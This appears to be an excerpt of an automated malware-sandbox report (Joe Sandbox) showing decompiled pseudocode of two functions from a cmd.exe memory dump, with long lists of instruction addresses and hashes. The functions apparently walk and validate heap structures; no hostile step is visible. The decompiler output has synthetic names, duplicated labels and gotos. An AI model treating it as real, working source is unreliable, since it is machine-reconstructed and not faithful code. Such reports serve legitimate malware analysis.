                                                                                                                                          0x03c56e67
                                                                                                                                          0x03c56e67
                                                                                                                                          0x03c56e73
                                                                                                                                          0x03c56e74
                                                                                                                                          0x03c56e77
                                                                                                                                          0x03c56e7c
                                                                                                                                          0x03c56e7d
                                                                                                                                          0x03c56e8e
                                                                                                                                          0x03c56e93
                                                                                                                                          0x03c56e9c
                                                                                                                                          0x03c56ea8
                                                                                                                                          0x03c56eab
                                                                                                                                          0x03c56eac
                                                                                                                                          0x03c56eb3
                                                                                                                                          0x03c56ecd
                                                                                                                                          0x03c56edc
                                                                                                                                          0x03c56ee2
                                                                                                                                          0x03c56ee5
                                                                                                                                          0x03c56ef2
                                                                                                                                          0x03c56efb
                                                                                                                                          0x03c56f01
                                                                                                                                          0x03c56f06
                                                                                                                                          0x03c56f0b
                                                                                                                                          0x03c56f11
                                                                                                                                          0x03c56f1a
                                                                                                                                          0x03c56f22
                                                                                                                                          0x03c56f26
                                                                                                                                          0x03c56f26
                                                                                                                                          0x03c56f33
                                                                                                                                          0x03c56f41
                                                                                                                                          0x03c56f44
                                                                                                                                          0x03c56f47
                                                                                                                                          0x03c56f54
                                                                                                                                          0x03c56f65
                                                                                                                                          0x03c56f77
                                                                                                                                          0x03c56f7c
                                                                                                                                          0x03c56f82
                                                                                                                                          0x03c56f91
                                                                                                                                          0x03c56f99
                                                                                                                                          0x03c56fa3
                                                                                                                                          0x03c56fae
                                                                                                                                          0x03c56fae
                                                                                                                                          0x03c56fba
                                                                                                                                          0x03c56fbb
                                                                                                                                          0x03c56fbc
                                                                                                                                          0x03c56fc1
                                                                                                                                          0x03c56fc2
                                                                                                                                          0x03c56fd3
                                                                                                                                          0x03c56fd8
                                                                                                                                          0x03c56fd8
                                                                                                                                          0x03c56fdf
                                                                                                                                          0x03c56fe8
                                                                                                                                          0x03c56fee
                                                                                                                                          0x03c56fee
                                                                                                                                          0x03c56ff5
                                                                                                                                          0x03c56ffb
                                                                                                                                          0x03c56ffb
                                                                                                                                          0x03c57004
                                                                                                                                          0x00000000
                                                                                                                                          0x03c5700a
                                                                                                                                          0x03c57004
                                                                                                                                          0x03c56eb3
                                                                                                                                          0x03c56e9c
                                                                                                                                          0x03c57015

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                          • Instruction ID: 29e5769d050df8d808473976357dd9db68ceb930e9b3485a1138e9891c1a3e65
                                                                                                                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                          • Instruction Fuzzy Hash: EF718F75E00619AFCB10DFA5C944AEEFBB9FF88304F144569E904EB250DB30EA85DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C91002 Relevance: .2, Instructions: 198COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C91002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x3cc5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x3cc58b0 = _t128;
								 *0x3cc58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x3cc58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x3cc58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x3cc58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x3cc58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x3cc5898 = 7;
										return _t75;
									} else {
										 *0x3cc5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x3cc5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                                                                                                                          0x03c91002
                                                                                                                                          0x03c9100c
                                                                                                                                          0x03c9100f
                                                                                                                                          0x03c91012
                                                                                                                                          0x03c91018
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9102e
                                                                                                                                          0x03c91030
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91032
                                                                                                                                          0x03c91032
                                                                                                                                          0x03c91038
                                                                                                                                          0x03c91038
                                                                                                                                          0x03c9121e
                                                                                                                                          0x03c911ff
                                                                                                                                          0x03c91205
                                                                                                                                          0x03c91207
                                                                                                                                          0x03c9120c
                                                                                                                                          0x03c9120e
                                                                                                                                          0x03c91210
                                                                                                                                          0x03c91212
                                                                                                                                          0x03c91212
                                                                                                                                          0x03c91210
                                                                                                                                          0x03c9121c
                                                                                                                                          0x03c9121c
                                                                                                                                          0x03c91228
                                                                                                                                          0x03c91228
                                                                                                                                          0x03c9101c
                                                                                                                                          0x03c9101c
                                                                                                                                          0x03c9101c
                                                                                                                                          0x03c9101f
                                                                                                                                          0x03c91022
                                                                                                                                          0x03c91025
                                                                                                                                          0x03c9102c
                                                                                                                                          0x03c9102c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9102c
                                                                                                                                          0x03c91027
                                                                                                                                          0x03c9102a
                                                                                                                                          0x03c9103f
                                                                                                                                          0x03c9103f
                                                                                                                                          0x03c91042
                                                                                                                                          0x03c91044
                                                                                                                                          0x03c91047
                                                                                                                                          0x03c91049
                                                                                                                                          0x03c9104c
                                                                                                                                          0x03c9104e
                                                                                                                                          0x03c91088
                                                                                                                                          0x03c91088
                                                                                                                                          0x03c9108a
                                                                                                                                          0x03c9108d
                                                                                                                                          0x03c9108f
                                                                                                                                          0x03c91091
                                                                                                                                          0x03c91091
                                                                                                                                          0x03c91093
                                                                                                                                          0x03c91095
                                                                                                                                          0x03c91097
                                                                                                                                          0x03c910c8
                                                                                                                                          0x03c910cb
                                                                                                                                          0x03c910ce
                                                                                                                                          0x03c910d0
                                                                                                                                          0x03c910f4
                                                                                                                                          0x03c910f4
                                                                                                                                          0x03c910fa
                                                                                                                                          0x03c91100
                                                                                                                                          0x03c91102
                                                                                                                                          0x03c91150
                                                                                                                                          0x03c91150
                                                                                                                                          0x03c91154
                                                                                                                                          0x03c91167
                                                                                                                                          0x03c9116a
                                                                                                                                          0x03c9116a
                                                                                                                                          0x03c91156
                                                                                                                                          0x03c91156
                                                                                                                                          0x03c91158
                                                                                                                                          0x03c9115b
                                                                                                                                          0x03c9115d
                                                                                                                                          0x03c9115f
                                                                                                                                          0x03c9115f
                                                                                                                                          0x03c9115f
                                                                                                                                          0x03c91162
                                                                                                                                          0x03c91162
                                                                                                                                          0x03c9116c
                                                                                                                                          0x03c9116f
                                                                                                                                          0x03c91171
                                                                                                                                          0x03c9117b
                                                                                                                                          0x03c9117b
                                                                                                                                          0x03c9117d
                                                                                                                                          0x03c91183
                                                                                                                                          0x03c91183
                                                                                                                                          0x03c91186
                                                                                                                                          0x03c91188
                                                                                                                                          0x03c91199
                                                                                                                                          0x03c9118a
                                                                                                                                          0x03c9118a
                                                                                                                                          0x03c9118c
                                                                                                                                          0x03c9118f
                                                                                                                                          0x03c91191
                                                                                                                                          0x03c91191
                                                                                                                                          0x03c91191
                                                                                                                                          0x03c91194
                                                                                                                                          0x03c91194
                                                                                                                                          0x03c9119c
                                                                                                                                          0x03c911a2
                                                                                                                                          0x03c911a8
                                                                                                                                          0x03c911ac
                                                                                                                                          0x03c911af
                                                                                                                                          0x03c911c7
                                                                                                                                          0x03c911b1
                                                                                                                                          0x03c911b1
                                                                                                                                          0x03c911b4
                                                                                                                                          0x03c911b7
                                                                                                                                          0x03c911b9
                                                                                                                                          0x03c911b9
                                                                                                                                          0x03c911b9
                                                                                                                                          0x03c911bc
                                                                                                                                          0x03c911c2
                                                                                                                                          0x03c911c2
                                                                                                                                          0x03c911cb
                                                                                                                                          0x03c911ce
                                                                                                                                          0x03c911d4
                                                                                                                                          0x03c911e7
                                                                                                                                          0x03c911ed
                                                                                                                                          0x03c911ef
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c911f1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c911d6
                                                                                                                                          0x03c911d6
                                                                                                                                          0x00000000
                                                                                                                                          0x03c911d6
                                                                                                                                          0x03c911d4
                                                                                                                                          0x03c91104
                                                                                                                                          0x03c91106
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91108
                                                                                                                                          0x03c9110c
                                                                                                                                          0x03c9111d
                                                                                                                                          0x03c9110e
                                                                                                                                          0x03c9110e
                                                                                                                                          0x03c91110
                                                                                                                                          0x03c91113
                                                                                                                                          0x03c91115
                                                                                                                                          0x03c91115
                                                                                                                                          0x03c91115
                                                                                                                                          0x03c91118
                                                                                                                                          0x03c91118
                                                                                                                                          0x03c91126
                                                                                                                                          0x03c9113a
                                                                                                                                          0x03c9113d
                                                                                                                                          0x03c9113f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91141
                                                                                                                                          0x03c91141
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91141
                                                                                                                                          0x03c9113f
                                                                                                                                          0x03c910d6
                                                                                                                                          0x03c910d9
                                                                                                                                          0x03c910dd
                                                                                                                                          0x03c910e3
                                                                                                                                          0x03c910e6
                                                                                                                                          0x03c910e9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c910ee
                                                                                                                                          0x03c910f0
                                                                                                                                          0x03c910f2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c910f2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91099
                                                                                                                                          0x03c91099
                                                                                                                                          0x03c9109c
                                                                                                                                          0x03c9109c
                                                                                                                                          0x03c9109e
                                                                                                                                          0x03c910a0
                                                                                                                                          0x03c910b3
                                                                                                                                          0x03c910a2
                                                                                                                                          0x03c910a2
                                                                                                                                          0x03c910a4
                                                                                                                                          0x03c910a7
                                                                                                                                          0x03c910a9
                                                                                                                                          0x03c910ab
                                                                                                                                          0x03c910ab
                                                                                                                                          0x03c910ab
                                                                                                                                          0x03c910ae
                                                                                                                                          0x03c910ae
                                                                                                                                          0x03c910b6
                                                                                                                                          0x03c910b9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c910be
                                                                                                                                          0x03c910c1
                                                                                                                                          0x03c910c3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c910c3
                                                                                                                                          0x03c910c5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c910c5
                                                                                                                                          0x03c91097
                                                                                                                                          0x03c91050
                                                                                                                                          0x03c91053
                                                                                                                                          0x03c91056
                                                                                                                                          0x03c91059
                                                                                                                                          0x03c9105c
                                                                                                                                          0x03c9105e
                                                                                                                                          0x03c91060
                                                                                                                                          0x03c91062
                                                                                                                                          0x03c91064
                                                                                                                                          0x03c91064
                                                                                                                                          0x03c91062
                                                                                                                                          0x03c91066
                                                                                                                                          0x03c91069
                                                                                                                                          0x03c9106b
                                                                                                                                          0x03c9106d
                                                                                                                                          0x03c9106f
                                                                                                                                          0x03c91076
                                                                                                                                          0x03c91076
                                                                                                                                          0x03c91076
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91076
                                                                                                                                          0x03c91071
                                                                                                                                          0x03c91074
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91074
                                                                                                                                          0x03c91079
                                                                                                                                          0x03c91079
                                                                                                                                          0x03c9107b
                                                                                                                                          0x03c9107b
                                                                                                                                          0x03c9107f
                                                                                                                                          0x03c91082
                                                                                                                                          0x03c91085
                                                                                                                                          0x00000000
                                                                                                                                          0x03c91085
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1654ae28866e0604d061cb2c9fd1a901c478e17771e5e16c6034b63fdbf79604
                                                                                                                                          • Instruction ID: d812a85edf2b12e757848a5cfcd4502e25798315b1d1de3b2fa800cadad787a6
                                                                                                                                          • Opcode Fuzzy Hash: 1654ae28866e0604d061cb2c9fd1a901c478e17771e5e16c6034b63fdbf79604
                                                                                                                                          • Instruction Fuzzy Hash: 0A715835A00662DBEF24CF56C48A67AF3F1FB44701B6E486FD892CB640D776AA50CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD52A5 Relevance: .2, Instructions: 161COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E03BD52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E03BEEEF0(0x3cc79a0);
					_t104 =  *0x3cc8210; // 0x3472d10
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E03BEEB70(_t93, 0x3cc79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03C19890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E03BEEEF0(0x3cc79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E03BEEB70(0, 0x3cc79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3472d1d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E03C0F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E03BEEEF0(0x3cc79a0);
									__eflags =  *0x3cc8210 - _t104; // 0x3472d10
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3cc8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03C54888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E03BEEB70(_t95, 0x3cc79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E03C195D0();
											L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E03C195D0();
											L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E03BEEB70(_t93, 0x3cc79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E03C195D0();
										L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E03C195D0();
										L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E03C0F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                                          0x03bd52a5
                                                                                                                                          0x03bd52ad
                                                                                                                                          0x03bd52b0
                                                                                                                                          0x03bd52b3
                                                                                                                                          0x03bd52b7
                                                                                                                                          0x03bd52ba
                                                                                                                                          0x03bd52bf
                                                                                                                                          0x03bd52c4
                                                                                                                                          0x03bd52cc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd52ce
                                                                                                                                          0x03bd52d9
                                                                                                                                          0x03bd52dd
                                                                                                                                          0x03bd52e7
                                                                                                                                          0x03bd52f7
                                                                                                                                          0x03bd52f9
                                                                                                                                          0x03bd52fd
                                                                                                                                          0x03c30dcf
                                                                                                                                          0x03c30dd5
                                                                                                                                          0x03c30dd6
                                                                                                                                          0x03c30dd7
                                                                                                                                          0x03c30dd8
                                                                                                                                          0x03c30dd9
                                                                                                                                          0x03c30dde
                                                                                                                                          0x03c30ddf
                                                                                                                                          0x03c30de0
                                                                                                                                          0x03c30de1
                                                                                                                                          0x03c30de2
                                                                                                                                          0x03c30de5
                                                                                                                                          0x03c30dea
                                                                                                                                          0x03c30dec
                                                                                                                                          0x03c30f60
                                                                                                                                          0x03c30f64
                                                                                                                                          0x03c30f70
                                                                                                                                          0x03c30f76
                                                                                                                                          0x03c30f79
                                                                                                                                          0x03c30f79
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30f64
                                                                                                                                          0x03c30df2
                                                                                                                                          0x03c30df7
                                                                                                                                          0x03c30e04
                                                                                                                                          0x03c30e0d
                                                                                                                                          0x03c30e0d
                                                                                                                                          0x03c30e10
                                                                                                                                          0x03c30e1a
                                                                                                                                          0x03c30e1c
                                                                                                                                          0x03c30e4c
                                                                                                                                          0x03c30e52
                                                                                                                                          0x03c30e61
                                                                                                                                          0x03c30e67
                                                                                                                                          0x03c30e6b
                                                                                                                                          0x03c30e70
                                                                                                                                          0x03c30e76
                                                                                                                                          0x03c30ed7
                                                                                                                                          0x03c30edc
                                                                                                                                          0x03c30ee0
                                                                                                                                          0x03c30ee6
                                                                                                                                          0x03c30eea
                                                                                                                                          0x03c30eed
                                                                                                                                          0x03c30ef0
                                                                                                                                          0x03c30ef3
                                                                                                                                          0x03c30ef6
                                                                                                                                          0x03c30ef9
                                                                                                                                          0x03c30efe
                                                                                                                                          0x03c30f01
                                                                                                                                          0x03c30f01
                                                                                                                                          0x03c30f0b
                                                                                                                                          0x03c30f12
                                                                                                                                          0x03c30f16
                                                                                                                                          0x03c30f18
                                                                                                                                          0x03c30f1b
                                                                                                                                          0x03c30f2c
                                                                                                                                          0x03c30f31
                                                                                                                                          0x03c30f31
                                                                                                                                          0x03c30f35
                                                                                                                                          0x03c30f39
                                                                                                                                          0x03c30f3a
                                                                                                                                          0x03c30f3c
                                                                                                                                          0x03c30f3f
                                                                                                                                          0x03c30f50
                                                                                                                                          0x03c30f55
                                                                                                                                          0x03c30f55
                                                                                                                                          0x03c30f59
                                                                                                                                          0x03bd52eb
                                                                                                                                          0x03bd52f1
                                                                                                                                          0x03bd52f1
                                                                                                                                          0x03c30e7d
                                                                                                                                          0x03c30e84
                                                                                                                                          0x03c30e88
                                                                                                                                          0x03c30e8a
                                                                                                                                          0x03c30e8d
                                                                                                                                          0x03c30e9e
                                                                                                                                          0x03c30ea3
                                                                                                                                          0x03c30ea3
                                                                                                                                          0x03c30ea7
                                                                                                                                          0x03c30eaf
                                                                                                                                          0x03c30eb3
                                                                                                                                          0x03c30eb9
                                                                                                                                          0x03c30eb9
                                                                                                                                          0x03c30ebc
                                                                                                                                          0x03c30ecd
                                                                                                                                          0x03c30ecd
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30eb3
                                                                                                                                          0x03c30e21
                                                                                                                                          0x03c30e2b
                                                                                                                                          0x03c30e2f
                                                                                                                                          0x03c30e30
                                                                                                                                          0x03c30e3a
                                                                                                                                          0x03c30e3f
                                                                                                                                          0x03c30e41
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30e47
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30e47
                                                                                                                                          0x03c30df9
                                                                                                                                          0x03c30dfe
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c30dfe
                                                                                                                                          0x03bd5303
                                                                                                                                          0x03bd5307
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd5309
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd5309
                                                                                                                                          0x03bd5307
